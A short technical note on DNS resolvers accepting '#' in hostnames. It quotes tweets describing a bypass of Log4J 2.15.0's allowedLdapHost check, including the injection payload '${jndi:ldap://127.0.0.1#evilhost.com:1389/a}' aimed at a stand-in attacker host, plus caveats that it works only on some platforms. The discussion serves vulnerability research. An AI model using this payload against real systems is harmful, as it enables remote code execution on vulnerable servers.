e.g. `host 127.0.0.1#test.example.com` will perform a DNS query as shown below, although # is not a valid character in a domain name 0020 da 7c 01 00 00 01 .|.... 0030 00 00 00 00 00 00 03 31 32 37 01 30 01 30 06 31 .......127.0.0.1 0040 23 74 65 73 74 07 65 78 61 6d 70 6c 65 03 63 6f #test.example.co 0050 6d 00 00 01 00 01 m.....
Ref: https://twitter.com/marcioalm/status/1471740771581652995 > FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks > in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} > and to bypass allowedClasses just choose a name for a class in the JDK. > Deserialization will occur as usual. #Log4Shell 1/n https://twitter.com/Shaquil86300527/status/1472153790463815680 > In my tests, this doesn’t work on Windows and Linux. It does works in MacOS and > FreeBSD. > # is not a valid for DNS but *some* resolver might query names with # in it. > TBC for this to work the vulnerable application must run on freeBSD or MacOS > and actor must control a DNS domain.